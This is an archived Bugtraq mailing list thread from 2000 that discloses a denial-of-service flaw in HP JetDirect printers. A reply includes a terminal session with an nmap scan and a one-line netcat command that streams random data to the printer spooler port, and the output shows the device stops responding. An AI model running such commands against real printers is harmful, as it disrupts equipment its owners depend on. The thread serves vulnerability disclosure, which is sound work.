Bugtraq mailing list archives
Re: DOS attack against HP JetDirect Printers (fwd)
From: john.bock () MARCHFIRST COM (John Bock)
Date: Fri, 21 Apr 2000 15:49:08 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I've never seen nmap dos a HP4000 printer but they do die if you toss junk at the spooler port. The printer display says 86.00x EIO 1 Error, and the red attention light goes on. At this point you have to power the printer back on and off. The rev's are the same as yours (G.08.x) so it should work for you. I think the other isssue is why are printers running all these services? -John # nmap -sT -PT 10.95.3.38 Starting nmap V. 2.30BETA20 by fyodor () insecure org ( www.insecure.org/nmap/ ) Interesting ports on (10.95.3.38): (The 1511 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 23/tcp open telnet 80/tcp open http 280/tcp open http-mgmt 515/tcp open printer 631/tcp open unknown 9100/tcp open jetdirect Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds # ping 10.95.3.38 PING 10.95.3.38 (10.95.3.38): 56 data bytes 64 bytes from 10.95.3.38: icmp_seq=0 ttl=57 time=23.976 ms ^C - --- 10.95.3.38 ping statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max/stddev = 23.976/23.976/23.976/0.000 ms # cat /dev/urandom | nc 10.95.3.38 515 ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ^X^C punt! (give it a few minutes) # ping 10.95.3.38 PING 10.95.3.38 (10.95.3.38): 56 data bytes ^C - --- 10.95.3.38 ping statistics --- 9 packets transmitted, 0 packets received, 100% packet loss
-----Original Message----- From: Alfred Huger [mailto:ah () SECURITYFOCUS COM] Sent: Thursday, April 20, 2000 11:45 AM To: BUGTRAQ () SECURITYFOCUS COM Subject: DOS attack against HP JetDirect Printers (fwd) Alfred Huger VP of Engineering SecurityFocus.com ---------- Forwarded message ---------- Date: Thu, 20 Apr 2000 13:08:47 +0200 From: Paul Knowles <Paul.Knowles () unifr ch> To: vuldb () securityfocus com Cc: knowles () pexppc33 unifr ch Subject: DOS attack against HP JetDirect Printers Hello, In case anyone is interested, scanning HP printers with tools such as nmap will cause the printer to lock up hard. I discovered this while trying to diagnose a connection problem we were having with a printer. I've verified this with at least the following versions of JetDirect: Firmware Rev. : A.08.06 Firmware Rev. : G.08.03 Firmware Rev. : G.07.17 Firmware Rev. : G.07.03 I haven't been able to establish the exact communications causing the lockup; someone with more experience than I should check this out. Any network accessable printer can be put out of service with a simple nmap -sT -PT HP.printer.tcp.ip A power cycle is required for reset. My apologies if i have the wrong email address. (there is no Submit a Bug instructions on the securityfocus site). HP have no bug reporting facilities either... thanks, Paul Knowles. email: Paul.Knowles () unifr ch finger me at pexppc33.unifr.ch for more contact information
-----BEGIN PGP SIGNATURE----- Version: PGP 6.5.3 iQA/AwUBOQC+FiwFkokFbeHBEQLOjQCcD0+J+v2Og2I6XqZx/xdOSKs/H38An1Ig bYNBTvOdrBJxZNpwtPL4CNtH =k1y4 -----END PGP SIGNATURE-----
Current thread:
- Re: DOS attack against HP JetDirect Printers (fwd) Ed Padin (Apr 20)
- <Possible follow-ups>
- Re: DOS attack against HP JetDirect Printers (fwd) John Bock (Apr 21)